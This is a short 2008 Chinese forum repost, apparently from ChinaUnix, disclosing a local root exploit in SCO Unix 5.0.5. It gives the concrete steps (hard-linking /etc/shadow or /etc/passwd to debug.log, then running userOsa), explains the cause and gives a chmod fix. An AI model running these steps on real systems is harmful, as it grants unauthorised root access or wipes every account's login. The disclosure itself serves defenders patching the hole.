- 论坛徽章:
- 1
|
SCO5.0.5 Unix 有一个大BUG——任何普通用户都可以成为超级用户.
步骤:
1. 用普通用户登录到系统,然后进入一个有写权限的目录
2. ln /etc/shadow debug.log (硬连接)
3. 执行/etc/sysadm.d/bin/userOsa (O是大写的字母o)
操作完成之后,/etc/shadow文件被覆盖, 此时可以使用系统中的
任何用户登陆系统,不用密码,包括root用户.
注: 如果2中改为ln /etc/passwd debug.log
则/etc/passwd被覆盖,谁也登录不了系统.
原因:
SCO5.0.5 Unix中/etc/sysadm.d/bin/userOsa程序在
运行时会生成一个名叫debug.log的文件,这个文件用户属于
root 组,而且此程序有BUG,不会检查用户权限,因此可以
覆盖任何文件,包括passwd和shadow.
清除此漏洞:
用root用户登录,到/etc/sysadm.d/bin下执,行
chmod o-x userOsa即可
此漏洞只在SCO5.0.5 unix存在, SCO5.0.6 unix或更高版本不
存在.
本文来自ChinaUnix博客,如果查看原文请点:http://blog.chinaunix.net/u/31/showart_508068.html |
|
免费注册
发表于 2008-03-25 21:01